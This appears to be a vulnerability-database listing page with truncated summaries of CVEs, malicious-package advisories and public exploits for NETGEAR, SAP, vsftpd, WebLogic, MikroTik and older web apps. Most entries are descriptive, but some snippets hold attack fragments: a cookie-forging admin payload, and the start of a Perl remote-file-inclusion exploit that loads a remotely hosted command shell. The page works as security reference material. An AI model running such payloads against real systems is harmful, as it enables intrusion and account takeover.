CVE-2019-12511

In NETGEAR Nighthawk X10-R9000 prior to 1.0.4.26, an attacker may execute arbitrary system commands as root by sending a specially-crafted MAC address to the "NETGEAR Genie" SOAP endpoint at AdvancedQoS:GetCurrentBandwidthByMAC. Although this requires QoS being enabled, advanced QoS being enabled...

EUVD-2018-19496

Malware in sbrugna...

EUVD-2011-1167

Malware in sbrugna...

EUVD-2021-6614

Malicious code in bioql PyPI...

Exploit for Unrestricted Upload of File with Dangerous Type in Sap Netweaver

CVE-2025-31324 CVE-2025-31324, SAP Exploit POST /developme...

CVE-2025-22367

The authenticated time setting capability of the firmware for Mennekes Smart / Premium Chargingpoints can be abused for command execution because OS command are improperly neutralized when certain fields are passed to the underlying OS...

macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'macOS Dirty Cow Arbitrary File Write Local Privilege Escalation', 'Description' = %q An app may be able to execute arbitrary code with kernel...

macOS Dirty Cow Arbitrary File Write Local Privilege Escalation Exploit

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'macOS Dirty Cow Arbitrary File Write Local Privilege Escalation', 'Description' = %q An app may be able to execute arbitrary code with kernel...

CVE-2022-45939

GNU Emacs through 28.2 allows attackers to execute commands via shell metacharacters in the name of a source-code file, because lib-src/etags.c uses the system C library function in its implementation of the ctags program. For example, a victim may use the "ctags " command suggested in the ctags...

Exploit for OS Command Injection in Vsftpd_Project Vsftpd

CVE-2011-2523 - vsftpd 2.3.4 Exploit Description - vsftpd...

Exploit for Missing Authentication for Critical Function in Oracle Weblogic_Server

简易说明 + 命令执行并回显 + 直接上传shell + linux下weblogic 10.3.6.0测试OK...

FS Freelancer Clone 1.0 - profile.php?u SQL Injection

FS Freelancer Clone 1.0 - profile.php?u SQL Injection Exploit Title: FS Freelancer Clone 1.0 - SQL Injection Dork: N/A Date: 08.12.2017 Vendor Homepage: https://fortunescripts.com/ Software Link: https://fortunescripts.com/product/freelancer-clone/ Demo: http://freelancer-clone.demonstration.co.i...

MikroTik Router Denial Of Service | ARP Table OverFlow Exploit

Exploit for hardware platform in category dos / poc CVE:2017-6444 Exploit Title: MikroTik Router Denial Of Service | ARP Table OverFlow Exploit Author: Hosein Askari FarazPajohan Vendor HomePage: https://mikrotik.com/ Series : Hap Lite Tested on: Parrot Security OS Date: 03-3-2017 Category: Netwo...

West silent technology smart device/cgi-bin/checkCookie command execution vulnerability

No description provided by source...

PokerMax Poker League Insecure Cookie Handling Vulnerability

No description provided by source. Author : DaRkLiFe Greetz : str0ke & S.W.A.T. & funkys0ul Script : PokerMax Poker League Insecure Cookie Handling Vulnerability Download: http://www.stevedawson.com/downloads/pokerleague.zip Exploit : javascript:document.cookie = "ValidUserAdmin=admin"; here...

Socketwiz BookMarks 2.0 - 'root_dir' Remote File Inclusion

!/usr/bin/perl use LWP::UserAgent; / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - Socketwiz Bookmarks perl exploit.pl http://site.com/Socketwiz BookmarksPath/ http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; $sciezka = $ARGV0; $sciezk...

CVE-2005-2482

CVE-2005-2482 affects Metasploit Framework 2.4 and earlier (msfweb StateToOptions). The vulnerability occurs when running with -D (defanged mode): an attacker could modify temporary environment variables before the _Defanged check is performed while processing the Exploit command. NVD lists a Bas...

CVE-2005-2482

The StateToOptions function in msfweb in Metasploit Framework 2.4 and earlier, when running with the -D option defanged mode, allows attackers to modify temporary environment variables before the "Defanged" environment option is checked when processing the Exploit command...

MySQL MaxDB 7.5 - WAHTTP Server Remote Denial of Service

source: https://www.securityfocus.com/bid/11843/info A remote denial of service vulnerability has been reported to affect the MySQL MaxDB WAHTTP server. This issue is due to a failure of the server to handle malformed requests. An attacker may leverage this issue to cause the affected Web server ...

CoffeeCup FTP Clients (Direct 6.2.0.62) (Free 3.0.0.10) - Remote Buffer Overflow

CoffeeCup FTP Clients Direct 6.2.0.62 Free 3.0.0.10 - Remote Buffer Overflow / CoffeeCup FTP Clients Buffer Overflow Vulnerability Exploit created by Komrade e-mail: unsecureataltervistadotorg web: http://unsecure.altervista.org Tested on: CoffeeCup Direct FTP 6.2.0.62 CoffeeCup Free FTP 3.0.0.10...